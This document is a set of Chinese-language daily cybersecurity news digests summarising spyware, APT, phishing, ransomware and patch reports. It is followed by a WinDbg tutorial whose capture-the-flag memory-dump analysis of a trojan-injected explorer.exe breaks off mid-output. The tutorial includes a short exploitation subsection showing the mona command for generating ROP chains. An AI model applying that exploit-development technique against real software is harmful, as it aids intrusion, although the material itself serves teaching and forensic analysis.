1、研究人员披露Predator间谍软件数百万美元许可模型 https://blog.talosintelligence.com/intellexa-and-cytrox-intel-agency-grade-spyware/ 复杂商业间谍软件Predator的一项新分析表明，其在重新启动之间持续存在的能力是作为“附加功能”提供的，并且取决于客户选择的许可选项。2021 年，Predator 间谍软件无法在受感染的 Android 系统上重新启动（iOS 上也有）。但是，到 2022 年 4 月，他们的客户就可以享受到这种功能了。Predator 可以针对 Android 和 iOS，被描述为一种“远程移动提取系统”，其以许可模式出售，根据初始访问所 2、APT33组织利用新的FalseFont恶意软件针对国防公司发起攻击 https://twitter.com/MsftSecIntel/status/1737895715911700830 伊朗网络间谍组织APT33正在使用最近发现的 FalseFont 后门恶意软件来攻击全球的国防承包商。微软观察到伊朗民族国家演员 Peach Sandstorm 试图向国防工业基地 (DIB) 部门的组织工作的个人提供一个新开发的名为 FalseFont 的后门。这些攻击的目标 DIB 部门包括超过 100000 家参与研究和开发军事武器系统、子系统和组件的国防公司和分包商。该黑客组织也被称为 Peach Sandstorm、HOLMIUM 或 Refined Kitten 3、诈骗者利用广告推送传播MS Drainer钓鱼网站盗取巨额加密货币 https://drops.scamsniffer.io/post/from-google-to-x-ads-tracing-the-crypto-wallet-drainers-58-million-trail/ 攻击者利用谷歌和 Twitter 的广告传播包含名为“MS Drainer”的加密货币流失程序的网站，该网站在过去 9 个月内已从 63210 名受害者那里窃取了 5900 万美元。从 2023 年 3 月至今，他们发现了超过一万个使用 MS Drainer 的网络钓鱼网站，其中 5 月、6 月和 11 月的活动激增。用户被带到一个看似合法的网络钓鱼网站，并被诱骗批准恶意合约，从 4、OpenAI针对ChatGPT数据泄露漏洞推出了不完善的修复程序 https://embracethered.com/blog/posts/2023/openai-data-exfiltration-first-mitigations-implemented/ OpenAI 缓解了 ChatGPT 中的数据泄露错误，该错误可能会将对话详细信息泄露到外部 URL。据发现该漏洞的研究人员称，缓解措施并不完美，因此攻击者在某些条件下仍然可以利用它。此外，ChatGPT 的 iOS 移动应用程序尚未实施安全检查，因此该平台上的风险仍未得到解决。安全研究人员发现了一种从 ChatGPT 中窃取数据的技术，并于 2023 年 4 月向 OpenAI 报告。该研究人员后 5、Ivanti发布了针对13个严重Avalanche RCE漏洞的补丁 https://forums.ivanti.com/s/article/Avalanche-6-4-2-Security-Hardening-and-CVEs-addressed Ivanti 发布了安全更新，修复了该公司 Avalanche 企业移动设备管理 (MDM) 解决方案中的 13 个关键安全漏洞。Avalanche 允许管理员通过互联网从一个中央位置管理超过 100000 台移动设备、部署软件并安排更新。这些安全缺陷是由WLAvalancheService 堆栈或基于堆的缓冲区溢出漏洞造成的。未经身份验证的攻击者可以在低复杂性攻击中利用它们，这些攻击不需要用户交互即可在未修补的系 6、攻击者利用伪造的F5 BIG-IP零日警告电子邮件部署数据擦除器 https://www.gov.il/he/Departments/publications/reports/alert_1687 以色列国家网络管理局警告称，假冒 F5 BIG-IP 零日安全更新的网络钓鱼电子邮件会部署 Windows 和 Linux 数据擦除器。以色列国家网络管理局 (INCD) 充当 CERT，负责保护国家免受网络威胁，并向组织和公民发出已知攻击的警告。自十月以来，以色列一直是亲巴勒斯坦和伊朗黑客活动分子的重点攻击目标，他们一直在对该国的组织进行数据盗窃和数据擦除攻击。11 月，研究人员发现了一种名为 BiBi Wiper 的新数据擦除器， 它同时针对 Linux 和 7、加密货币诈骗者滥用Twitter功能来冒充知名账户 https://twitter.com/XrplServices/status/1736432471166660814 加密货币诈骗者正在滥用合法的 Twitter“功能”来宣传诈骗、虚假赠品以及用于窃取您的加密货币和 NFT 的欺诈性 Telegram 频道。在 X（以前更广泛地称为 Twitter）上，帖子的 URL 由发推者的帐户名和状态 ID 组成。网站使用状态 ID 来确定应从网站数据库加载哪些帖子，而不去检查帐户名是否有效。这允许您获取推文的 URL 并将帐户名称修改为您想要的任何名称，甚至是高调的帐户。访问 URL 时，网站只会将您重定向到与 ID 关联的正确 URL。诈骗者在 8、安卓恶意软件Chameleon禁用指纹解锁以窃取PIN https://www.threatfabric.com/blogs/android-banking-trojan-chameleon-is-back-in-action Chameleon Android 银行木马以新版本重新出现，该版本使用一种棘手的技术来接管设备——禁用指纹和面部解锁来窃取设备 PIN。它通过使用 HTML 页面技巧来获取对辅助功能服务的访问权限，并使用一种破坏生物识别操作以窃取 PIN 并随意解锁设备的方法来实现此目的。今年 4 月发现的 Chameleon 早期版本冒充澳大利亚政府机构、银行和 CoinSpot 加密货币交易所，在受感染的设备上执行键盘记录、覆盖注入 9、Inhospitality恶意垃圾邮件活动针对酒店业发起攻击 https://news.sophos.com/en-us/2023/12/19/inhospitality-malspam-campaign-targets-hotel-industry/ 一项针对全球酒店的密码窃取恶意软件活动正在利用有关服务问题或信息请求的电子邮件投诉作为社会工程诱饵，以获取活动目标的信任，然后再向其发送链接恶意负载。攻击者最初通过电子邮件联系目标，该电子邮件只包含文本，但主题是服务面向企业（如酒店）会希望快速响应。只有在目标回复威胁行为者的初始电子邮件后，威胁行为者才会发送后续消息，链接到他们声称的有关其请求或投诉的详细信息。社会工程角度涵盖了各种各样的主题，但可以分 10、游戏巨头育碧正在调查数据泄露事件 https://securityaffairs.com/156331/data-breach/ubisoft-investigating-alleged-data-breach.html 游戏发行商育碧正在审查著名研究人员 vx-underground 披露证据后有关潜在数据泄露。研究人员报告称，2023 年 12 月 20 日，一名未知威胁参与者可以访问育碧基础设施大约 48 小时。管理员发现攻击后将入侵者锁定。目前尚不清楚攻击者如何入侵该公司，他们试图窃取 R6 Siege 用户数据，但没有成功。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、研究人员披露Terrapin攻击可降低OpenSSH连接的安全性 https://terrapin-attack.com/ 学术研究人员开发了一种名为 Terrapin 的，该攻击会在握手过程中操纵序列号，从而在使用某些广泛使用的加密模式时破坏 SSH 通道的完整性。这种操作使攻击者可以删除或修改通过通信通道交换的消息，从而导致 OpenSSH 9.5 中用于用户身份验证的公钥算法降级或禁用针对击键计时攻击的防御。Terrapin 攻击利用了 SSH 传输层协议的弱点，并结合了 OpenSSH 十多年前引入的较新的加密算法和加密模式。Terrapin 攻击会在客户端或服务器不注意的情况下截断重要的协商消息，从而降低已建立连接的安全性。 2、研究人员披露零点击Outlook RCE漏洞的新细节 https://www.akamai.com/blog/security-research/chaining-vulnerabilities-to-achieve-rce-part-two 研究人员披露有关微软 Windows 系统中两个现已修补的安全漏洞的技术细节，攻击者可能会利用这些漏洞在 Outlook 电子邮件服务上实现远程代码执行，而无需任何用户交互。互联网上的攻击者可以将这些漏洞链接在一起，针对 Outlook 客户端创建完整的零点击远程代码执行 (RCE) 漏洞。Microsoft 于8 月和 2023 年 10 月解决了安全问题下面分别列出了CVE-2023-35384（CV 3、Vans和North Face的总公司VF Corp遭受勒索软件攻击 https://www.sec.gov/ix?doc=/Archives/edgar/data/0000103379/000095012323011228/d659095d8k.htm 美国全球服装和鞋类巨头 VF 公司（旗下拥有 Supreme、Vans、Timberland 和 The North Face 等品牌）披露了一起导致运营中断的安全事件。VF Corp. 是一家总部位于科罗拉多州的服装公司，拥有 13 个全球知名品牌。该公司拥有 35000 名员工，年收入达 116 亿美元。除上述品牌外，VF Corp. 还拥有 Dickies、Eastpak、Kipling、Napapij 4、ESET 修复安全流量扫描功能中的高严重性漏洞 https://www.securityweek.com/eset-patches-high-severity-vulnerability-in-secure-traffic-scanning-feature/ ESET 已为其多个端点和服务器安全产品发布了补丁，以解决一个高严重性漏洞，该漏洞可能被利用导致 Web 浏览器信任不应信任的网站。 5、Ivanti 修补了 Avalanche MDM 产品中的十几个关键漏洞 https://www.securityweek.com/ivanti-patches-dozen-critical-vulnerabilities-in-avalanche-mdm-product/ Ivanti 向客户通报其 Avalanche 企业移动设备管理 (MDM) 产品中已修复的 20 个漏洞，其中包括十多个严重程度为“严重”的漏洞。 6、谷歌发布紧急更新解决了一个新的被利用的Chrome零日漏洞 https://securityaffairs.com/156231/security/google-addressed-a-new-actively-exploited-chrome-zero-day.html 谷歌发布了紧急更新，以解决其网络浏览器 Chrome 中的一个新的零日漏洞（编号为 CVE-2023-7024）。 7、钓鱼活动利用旧的MS Excel 漏洞传播 Agent Tesla 恶意软件 https://thehackernews.com/2023/12/hackers-exploiting-old-ms-excel.html 作为网络钓鱼活动的一部分，攻击者正在利用旧的 Microsoft Office 漏洞来传播名为Agent Tesla的恶意软件。感染链利用以发票为主题的消息中附加的诱饵 Excel 文档来诱骗潜在目标打开它们并激活 CVE-2017-11882（CVSS 评分：7.8）的利用，这是 Office 公式编辑器中的内存损坏漏洞，可能会导致代码以用户权限执行。 8、数据泄露暴露了 15 亿条房产记录，包括特朗普、马斯克等名人 https://www.hackread.com/data-leak-exposes-real-estate-records-elon-musk-trump 由于云服务器配置错误，纽约坎贝尔的一家名为房地产财富网平台暴露了大量房地产记录。暴露的数据库保存了 15 亿条记录，其中包括数百万人的房地产所有权数据。从埃隆·马斯克和凯莉·詹纳到布兰妮·斯皮尔斯、唐纳德·J·特朗普和弗洛伊德·梅威瑟，顶级名人和普通房主的房地产记录在没有任何安全认证或密码的情况下在网上公开。 9、新型网络钓鱼攻击能绕过 Instagram 2FA 验证！ https://www.freebuf.com/articles/387283.html 一种新型网络钓鱼活动伪装成 "版权侵权 "电子邮件，试图窃取 Instagram 用户的备份代码，以帮助威胁攻击者绕过账户上配置的双因素身份验证（2FA）。 10、网信披露：四川省某医院遭受网络攻击导致全院系统瘫痪 http://www.anquan419.com/knews/24/6454.html 据网信四川近日披露，四川省某医院遭受网络攻击导致全院系统瘫痪，公安机关迅速调集技术力量赶赴现场，指导相关单位开展事件调查和应急处置工作。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、伊朗攻击者利用MuddyC2Go在非洲各地实施电信间谍攻击 https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms2、新型恶意广告活动伪装成流行软件PikaBot进行分发 https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-adsPikaBot 恶意软件加载程序作为恶意广告活动针对搜索用户的一部分进行分发适用于 AnyDesk 等合法软件。PikaBot 以前仅通过与 QakBot 类似的恶意垃圾邮件活动进行分发，并成为名为 TA577 的威胁参与者的首选有效负载之一。该恶意软件家族于 2023 年初首次出现，由加载程序和核心组成模块，允许其作为后门以及其他有效负载的分发者运行。这使攻击者能够获得对受感染系统的未经授权的远程 3、攻击者滥用GitHub来逃避检测和控制受感染的主机 https://www.reversinglabs.com/blog/malware-leveraging-public-infrastructure-like-github-on-the-rise攻击者越来越多地通过新方法利用 GitHub 进行恶意目的，包括滥用秘密 Gists 以及通过 git commit 消息发出恶意命令。恶意软件作者偶尔会将他们的样本放置在 Dropbox、Google Drive、OneDrive 和 Discord 等服务中，以托管第二阶段恶意软件和回避检测工具。最近，研究人员发现越来越多的人使用 GitHub 开源开发平台来托管恶意软件。已知使用合法公共服务攻 4、微软确认Windows 11更新后存在Wi-Fi连接问题 https://support.microsoft.com/en-us/topic/december-4-2023-kb5032288-os-builds-22621-2792-and-22631-2792-preview-538fbe4a-e9de-4312-85cd-d870444341d0Microsoft 已确认某些 Windows 11 设备在安装最近的累积更新后遇到 Wi-Fi 连接问题。尽管该公司仅提到KB50532288可选预览更新作为这些 Wi-Fi 网络连接问题的原始更新，但大多数受影响的客户在安装本月补丁星期二期间发布的KB5033375累积更新后受到了影响。据报道，如果 5、Xfinity遭遇数据泄露影响超过3500万个人信息 https://www.businesswire.com/news/home/20231218979935/en/Notice-To-Customers-of-Data-Security-Incident/康卡斯特有线通信公司（以 Xfinity 名义开展业务）周一透露，10 月份入侵其 Citrix 服务器的攻击者还从其系统中窃取了客户敏感信息。10 月 25 日，即 Citrix发布安全更新以解决现在称为Citrix Bleed并追踪为 CVE-2023-4966 的严重漏洞大约两周后，这家电信公司发现了 10 月 16 日至 19 日期间其网络上存在恶意活动的证据。至少从 2023 年 6、Mozilla 修补 Firefox 漏洞，这些漏洞允许远程执行代码、沙箱逃逸 https://www.securityweek.com/mozilla-patches-firefox-vulnerability-allowing-remote-code-execution-sandbox-escape/Mozilla 周二宣布了 Firefox 和 Thunderbird 的安全更新，以解决 20 个漏洞，其中包括多个内存安全问题。 7、德国警方查获暗网市场 Kingdom Market https://securityaffairs.com/156218/cyber-crime/police-seized-kingdom-market.html德国联邦刑事警察局 (BKA) 和法兰克福打击网络犯罪单位 (ZIT) 以及多个国家（美国、瑞士、摩尔多瓦和乌克兰）的执法机构开展了一项行动，查封了暗网市场 Kingdom Market。 8、国际刑警反诈执法行动"HAECHI IV"查获 3 亿美元逮捕约3,500 名嫌疑人 https://securityaffairs.com/156209/cyber-crime/haechi-iv-operation-interpol.html国际刑警组织本周宣布，一项名为“HAECHI IV”的国际执法行动逮捕了约 3,500 名嫌疑人，并没收了价值约 3 亿美元的资产。这项为期六个月的行动（2023 年 7 月至 12 月）针对涉及七种类型在线诈骗的组织：商业电子邮件泄露(BEC)、电子商务欺诈、投资欺诈、语音网络钓鱼、与非法在线赌博相关的洗钱、浪漫诈骗和在线诈骗。性勒索计划。 9、复杂的 JaskaGO 信息窃取程序针对 macOS 和 Windows https://securityaffairs.com/156185/malware/jaskago-information-stealer-macos-windows.html专家警告说，JaskaGO 是一种基于 Go 的新型信息窃取恶意软件，针对 Windows 和 Apple macOS 系统。 10、Play勒索软件已完成RaaS业务转型，曾袭击全球超300家企业机构 https://www.freebuf.com/news/387140.html据澳大利亚和美国发布的最新联合网络安全公告称，截至今年 10 月，Play 勒索软件已影响了约 300 家企业。据悉，Play 勒索软件采用双重勒索模式，会在数据外流后对系统进行加密，现已对北美、南美、欧洲和澳大利亚等众多企业和关键基础设施组织造成了影响。Play 又名 Balloonfly / PlayCrypt，最早出现于 2022 年，曾利用微软 Exchange 服务器（CVE-2022-41040 和 CVE-2022-41082）和 Fortinet 设备（CVE-2018-13379 和 CVE-20 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、VoIP通信公司3CX警告客户禁用SQL数据库集成 https://www.3cx.com/blog/news/sql-database-integration/ VoIP 通信公司 3CX 今天警告客户禁用 SQL 数据库集成，因为它所描述的潜在漏洞存在潜在风险。尽管今天发布的安全公告缺乏有关该问题的任何具体信息，但它建议客户通过禁用 MongoDB、MsSQL、MySQL 和 PostgreSQL 数据库集成来采取预防措施。该安全问题仅影响 3CX 互联网语音协议 (VOIP) 软件的版本 18 和 20。此外，并非所有基于 Web 的 CRM 集成都会受到影响。 2、QakBot恶意软件针对酒店业发起网络钓鱼攻击 https://twitter.com/MsftSecIntel/status/1735856754427047985 微软现警告 QakBot 再次在网络钓鱼活动中分发，伪装成来自 IRS 员工的电子邮件。微软表示，它于 12 月 11 日在一次针对酒店业的小型活动中首次观察到网络钓鱼攻击。电子邮件中附有一个伪装成来宾名单的 PDF 文件，上面写着“文档预览不可用”。然后提示用户下载 PDF 才能正常查看。然而，当点击下载按钮时，接收者将下载一个 MSI，安装后会将 Qakbot 恶意软件 DLL 启动到内存中。 3、微软新推出更安全的Windows保护打印模式 https://techcommunity.microsoft.com/t5/security-compliance-and-identity/a-new-modern-and-secure-print-experience-from-windows/ba-p/4002645 Microsoft 宣布推出新的 Windows 保护打印模式 (WPP)，为 Windows 打印系统引入了显着的安全增强功能。WPP 构建于现有的 IPP 打印堆栈之上，仅支持 Mopria 认证的打印机，并禁用加载第三方驱动程序的功能。打印错误在 Stuxnet 和 Print Nightmare 中发挥了重要作 4、美国贷款巨头库珀先生泄露了1470万名客户数据 https://www.freebuf.com/news/387030.html 美国抵押贷款巨头库珀先生（Mr.Cooper )发出通告称，近期的一次网络攻击已经泄露了 1470 万曾在该公司抵押贷款的客户数据。 5、微软在 Perforce Helix 核心服务器中发现4个安全漏洞 https://www.freebuf.com/news/387010.html 微软分析师在对Perforce Helix的游戏开发工作室产品进行安全审查时，发现为游戏、政府、军事和技术等部门广泛使用的源代码管理平台 Perforce Helix Core Server 存在四大漏洞，并于今年 8 月底向 Perforce 报告了这些漏洞，其中一个漏洞被评为严重漏洞。 6、工信部推出针对数据安全事件的彩色编码行动计划 https://thehackernews.com/2023/12/chinas-miit-introduces-color-coded.html 中国工业和信息化部（MIIT）周五公布了提案草案，详细说明了其使用颜色编码系统解决中国数据安全事件的计划。该部门表示，这项工作旨在“提高对数据安全事件的综合反应能力，确保及时有效地控制、减轻和消除数据安全事件造成的危害和损失，保护个人和组织的合法权益，维护国家安全和公共利益。 7、新疆公安机关公布8起网络违法犯罪典型案例 https://www.secrss.com/articles/61840 为切实净化网络环境，有效维护网络空间清朗，新疆公安机关依法持续严打涉网违法犯罪，侦办了一批网络违法犯罪案件。 8、从电子消费巨头到美国法院，BlackCat 向全球目标发起攻击 https://www.freebuf.com/news/topnews/386935.html BlackCat勒索软件（又名AlphaVM、AlphaV或ALPHV）于2021年11月中旬首次被Malwarehuntertam研究人员披露，是第一个基于RUST语言编写的专业勒索软件家族系列，并因其高度定制化和个性化的攻击而迅速赢得市场。该软件不仅能够在各种企业环境进行攻击，还在短期内成功执行了多次引人注目的攻击，受害者包括汽车消费电子巨头 Voxx Electronics、美国法院、知名手表品牌Seiko等等。 9、国家数据局《“数据要素×”三年行动计划 》公开征求意见 https://www.secrss.com/articles/61824 充分发挥数据要素的放大、叠加、倍增作用，构建以数据为关键要素的数字经济，是推动高质量发展的必然要求。为深入贯彻落实习近平总书记关于发挥数据要素作用的重要指示精神和党中央、国务院决策部署，发挥数据要素乘数效应，赋能经济社会发展，特制订本行动计划。 10、FBI 声称已捣毁 ALPHV/BLACKCAT 勒索软件Tor 泄露站点 https://securityaffairs.com/156124/cyber-crime/alphv-blackcat-ransomware-group-seizure.html 美国联邦调查局 (FBI) 宣布查获 AlphV/Blackcat 勒索软件组织的 Tor 泄露站点。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、谷歌Chrome测试新的跟踪保护可阻止第三方Cookie https://blog.google/products/chrome/privacy-sandbox-tracking-protection/ Google 周四宣布将开始测试一项名为“跟踪保护”的新功能。从 2024 年 1 月 4 日开始，向 1% 的 Chrome 用户提供此服务，作为其在网络浏览器中弃用第三方 Cookie 的一部分。该设置旨在限制“默认情况下限制网站访问第三方 Cookie 的跨站点跟踪”。跟踪保护的参与者将被随机选择，选定的用户将在桌面或安卓设备上打开 Chrome 时收到通知。其目标是默认限制第三方 Cookie（也称为“非必需 Cookie”），防止它们被用 2、CISA敦促制造商消除默认密码以减轻网络威胁 https://www.cisa.gov/news-events/alerts/2023/12/15/cisa-secure-design-alert-urges-manufacturers-eliminate-default-passwords 美国网络安全和基础设施安全局 (CISA) 敦促制造商完全废除互联网暴露系统上的默认密码，理由是攻击者可能会利用这些严重风险来获得对组织的初始访问权限并在组织内横向移动。在上周发布的警报中，该机构谴责隶属于伊斯兰革命卫队（IRGC）的伊朗威胁行为者利用带有默认密码的操作技术设备来访问美国的关键基础设施系统。默认密码是指嵌入式系统、设备和设备的出厂默 3、MongoDB承认遭遇网络攻击导致客户数据泄露 https://twitter.com/vxunderground/status/1736134217321370109 MongoDB 警告称，该公司本周早些时候检测到的一次网络攻击中，其公司系统遭到破坏，客户数据遭到泄露。该公司表示，他们检测到他们的系统在周三晚上（12 月 13 日）遭到黑客攻击，并开始调查该事件。MongoDB 正在调查涉及未经授权访问某些 MongoDB 公司系统的安全事件。这包括暴露客户帐户元数据和联系信息。目前，他们不知道客户存储在 MongoDB Atlas 中的数据有任何泄露。该公司不认为黑客访问了 MongoDB Atlas 中存储的任何客户数据。然而，M 4、微软警告Storm-0539节日礼品卡诈骗活动持续增加 https://twitter.com/MsftSecIntel/status/1735351713907773711 微软警告称，其追踪的新兴威胁集群中的恶意活动有所增加Storm-0539，用于精心策划礼物在假日购物季期间，通过高度复杂的电子邮件和短信网络钓鱼攻击零售实体进行银行卡欺诈和盗窃。攻击的目标是传播诱杀链接，将受害者引导至能够获取其凭据和会话令牌的中间对手 (AiTM) 网络钓鱼页面。获得初始会话和令牌的访问权限后，Storm-0539 会注册自己的设备以进行后续的二次身份验证提示，绕过 MFA 保护并使用完全受损的身份持续存在于环境中。以这种方式获得的立足点进一步充当了特权升 5、攻击者针对WordPress托管提供商Kinsta发起谷歌广告钓鱼活动 https://www.bleepingcomputer.com/news/security/wordpress-hosting-service-kinsta-targeted-by-google-phishing-ads/ WordPress 托管提供商 Kinsta 警告客户，已观察到 Google 广告宣传钓鱼网站以窃取托管凭证。Kinsta 表示，网络钓鱼攻击的目的是窃取 MyKinsta 的登录凭据，MyKinsta 是该公司提供的一项关键服务，用于管理 WordPress 和其他基于云的应用程序。Kinsta 在发送给客户的电子邮件中表示，它已发现攻击者正在利用 Google A 6、网络攻击导致伊朗大部分加油站瘫痪 https://www.securityweek.com/a-suspected-cyberattack-paralyzes-the-majority-of-gas-stations-across-iran/ 据伊朗国家电视台报道，伊朗近 33,000 个加油站中的近 70% 周一因可能遭受网络攻击而停止服务。 7、SMTP 走私攻击允许欺骗性电子邮件绕过身份验证协议 https://www.securityweek.com/smtp-smuggling-allows-spoofed-emails-to-bypass-authentication-protocols/ 一种名为 SMTP 走私的新攻击技术可以允许恶意行为者发送绕过身份验证机制的欺骗性电子邮件。 8、研究人员披露Radamanthys信息窃取恶意软件新功能 https://blog.checkpoint.com/security/unveiling-the-new-threats-rhadamanthys-v0-5-0-a-research-overview-by-check-point-research-cpr/ Rhadamanthys 信息窃取恶意软件的开发人员最近发布了两个主要版本，全面添加改进和增强功能，包括新的窃取功能和增强的规避功能。Rhadamanthys 是一种 C++ 信息窃取程序，于 2022 年 8 月首次出现，目标是电子邮件、FTP 和在线银行服务帐户凭据。该窃取程序通过订阅模式出售给网络犯罪分子，因此它会通过各种渠道 9、InfectedSlurs 僵尸网络针对 QNAP VioStor NVR 漏洞 https://securityaffairs.com/155972/hacking/infectedslurs-botnet-qnap-viostor-nvr.html 基于 Mirai 的僵尸网络 InfectedSlurs 被发现主动利用两个零日漏洞针对 QNAP VioStor NVR（网络录像机）设备。研究人员于 2023 年 10 月发现了该僵尸网络，但他们认为该僵尸网络至少从 2022 年起就一直活跃。专家们向各自的供应商报告了这两个漏洞，但他们计划在 2023 年 12 月发布修复程序。 10、游戏开发商Insomniac遭黑客入侵，《金刚狼》相关数据疑被泄露 https://www.secrss.com/articles/61726 漫威蜘蛛侠》系列开发商Insomniac Games最近遭到一个名为Rhysida的黑客组织攻击，该勒索软件团伙声称他们窃取到了即将推出的《金刚狼》游戏的详细信息以及一些前任和现任员工的数据。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、WinDbg介绍 WinDbg是一款Windows强大的调试器，可以调试0和3环的程序。 在实际开发中，可以调试我们的错误程序，从而定位关键代码，进行程序代码修复。 WinDbg 是一种调试器工具，由微软公司开发，用于分析和调试 Windows 操作系统和应用程序。它提供了强大的调试功能，可以帮助开发人员识别和解决各种软件问题。 以下是 WinDbg 的一些主要特点和功能： 内核级和用户级调试支持： WinDbg 可以用于内核级别的调试（如 Windows 内核、驱动程序等）和用户级别的调试（如应用程序、DLL 等），使开发人员能够全面分析和调试整个系统栈。 符号和源代码支持： WinDbg 可以与符号文件（PDB 文件）结合使用，以获得更详细的调试信息，包括函数名、变量名和源代码行号等。这对于理解和追踪代码执行路径非常有帮助。 调试器扩展： WinDbg 支持通过扩展插件（例如 JavaScript 脚本）来增强其功能。这些扩展可以自定义命令、自动化任务、数据分析等，使调试过程更高效和灵活。 远程调试： WinDbg 支持在远程计算机上进行调试，这对于分析在另一台计算机上发生的问题非常有用。 内存分析： WinDbg 可以帮助分析内存转储文件（如 minidump、完全转储等），以了解程序崩溃或异常终止的原因。 性能分析： WinDbg 提供了一些性能分析工具和命令，可以帮助开发人员识别和解决性能瓶颈问题。 脚本和自动化： WinDbg 具有自己的脚本语言（类似于 JavaScript），允许开发人员编写脚本来执行自动化任务，例如批量调试、数据提取等。 WinDbg 是一款功能强大且灵活的调试器工具，可用于分析和解决各种 Windows 软件问题。它在软件开发、故障排除和性能优化方面都扮演着重要角色，并广泛应用于开发人员和系统管理员的工作中。 2、Windbg安装 Windbg 10需要下载WindowsSDK 然后进行安装即可。 安装这一步属于基础，按照搜索到的步骤进行安装即可 Windbg 10 自带了帮助文档 ‍ ‍3、dmp文件介绍 .dmp 文件是一种用于存储系统或应用程序崩溃时的信息的内存映射文件。 dmp 文件通常包含了在崩溃或异常事件发生时系统或应用程序的内部状态信息和堆栈跟踪信息，它们对于诊断问题和进行调试非常有用。 当程序运行到某些重大错误的时候，windows会帮我们生成一个.dmp文件，这里的dmp就是文件进程的内存镜像，可以把程序的执行状态通过调试器保存在其中。 可以使用任务管理器进行生成 创建转储文件，即可生成对应的dmp文件 ‍4、pdb文件介绍 .pdb 文件是用于存储调试信息的程序数据库文件。 pdb 文件包含了有关源代码的符号信息，如变量名称、函数名称、类型信息以及源代码文件和行号的映射。这使得调试器能够将二进制文件中的地址映射回源代码。 ‍5、Windbg基础命令 提供debugger.chm文件（下载安装Windbg10自带） assets/debugger-20231210184705-cedqbbl.chm 命令已经很全了，这里只总结常用的指令。 windbg的指令分成以下几类 标准命令 元命令 扩展指令 标准命令相当于是内建在windbg中的默认指令。 元命令则是提供给标准指令中没有的指令，调用时开头要加上. 符号。 扩展指令则是用于实现针对特定目标的调试功能，使用前要加上! 符号，其完整的调用格式为: ！nameofExtentModule.nameofExtentCommand 参数 其中如果扩栈模块已经加载了，那么nameofExtentModule. 不是必须的，windbg会直接查找。 5.1 执行、调试相关 dt The dt command displays information about a local variable, global variable or data type. This can display information about simple data types, as well as structures and unions. dt命令看可以显示局部变量、全局变量或数据类型的信息。它也可以仅显示数据类型。即结构和联合(union)的信息。 #查看当前线程块 dt _teb d 查看数据 默认格式如下 d [type] [address range] d这个命令能够查看指定地址和内存的内容，其中常用的有dd（使用双字节来查看内存内容），如： dd 77400000 ！peb 可以查看当前进程中的peb的基本情况。 bp The bp, bu, and bm commands set one or more software breakpoints. You can combine locations, conditions, and options to set different kinds of software breakpoints. 指令格式如下 bp <address> 常见的下断点的方式。对应的清除断点的方式为bc num,而列出断点的方法为bl g 最基本的指令，运行当前程序。 u 将指定的地址反汇编: u[u|b] address(.表示当前的程序执行地址)uu Address L[Length] 其中uu和ub可以指定当前反汇编的长度(暂时没看出什么区别，似乎是ub的话使用.会自动计算从函数开始的地址进行汇编)。可以使用以下的语法进行长度的指定 使用L表示后面的数字表示的是长度 r 查看当前的寄存器 同时可以修改当前的寄存器，比如说: r @eax=1 将当前的eax寄存器的值修改成1 ed ed # ed [address][content] 将当前的内存修改成指定值 例如 ed 08041000 11111111 将地址08041000处的内容修改成11111111 p 常见指令，单步步过。除此之外还有: p 2 // 2为步进数目 pc // 执行到下一个函数调用处停下 【Step to Next Call】 pa 7c801b0b // 执行到7c801b0b地址处停下 【Step to Adress】 t 单步步入 k 查看栈帧调用顺序 5.2 调试辅助相关 .sympath 表示当前的符号加载情况。符号能够帮助我们更加方便的分析程序。 .sympath+ D:\Filename 将D:\Filename添加到符号查找的路径中。 关于符号，其中lm 指令可以检查当前的文件中是否加载了符号文件: deffered：表示延迟绑定 pdb symbols：表示已经加载当前符号 .load .load dllname 导入指定名字的dll文件，常常用于导入插件 5.3 漏洞利用相关 !py mona mona 是一个好东西哈，可以用来生成ROP ，查找Gadget ，进行漏洞挖掘等等。 生成ROP Chain !py mona rop -m "module" 利用module生成ROP Chain ‍ 6、实战：windbg分析题目 这里使用了WindbgPreview来分析这道dmp 题目描述： 赛题描述:explorer.exe进程已经被木马感染了，现已经获取explorer.exe进程的dump文件，尝试从DUMP文件中找到flag 打开的效果： 使用第一条命令： !analyze -v !analyze -v 是 WinDbg 调试器中的一个命令，用于自动分析崩溃的原因。这个命令会执行一些步骤来帮助你找到崩溃的根本原因，包括输出调用栈、异常信息、可能引起问题的模块以及其他相关信息。 !analyze 是命令，-v表示详细输出的参数 发现没什么信息，尝试使用 命令 lm，列出当前加载的模块 根据题目描述，感觉像是注入了恶意dll 输出了很多结果 这里有个小技巧，加载了对应符号的pdb，可以先排除 这么多dll，怎么分析？ 这里再教一个小技巧，系统dll的地址一般都很高。 这里就有一个很可疑的dll 地址这么低，和系统dll的地址显得格格不入 猜测这是可疑dll，使用命令进行分析 start    end        module name 10000000 1000e000   stolen     (deferred) 将光标移动到stolen，windbgpreview会输出一段信息： 或者运行命令： lmv m stolen lmv m 是 WinDbg 调试器中的一个命令，用于显示指定模块的详细信息。该命令可以帮助你查看模块的基地址、文件名、调试符号等信息。0:030> lmDvmstolen Browse full module list start    end        module name 10000000 1000e000   stolen     (deferred)              Image path: C:\Users\Administrator\Desktop\stolen.dll    Image name: stolen.dll    Browse 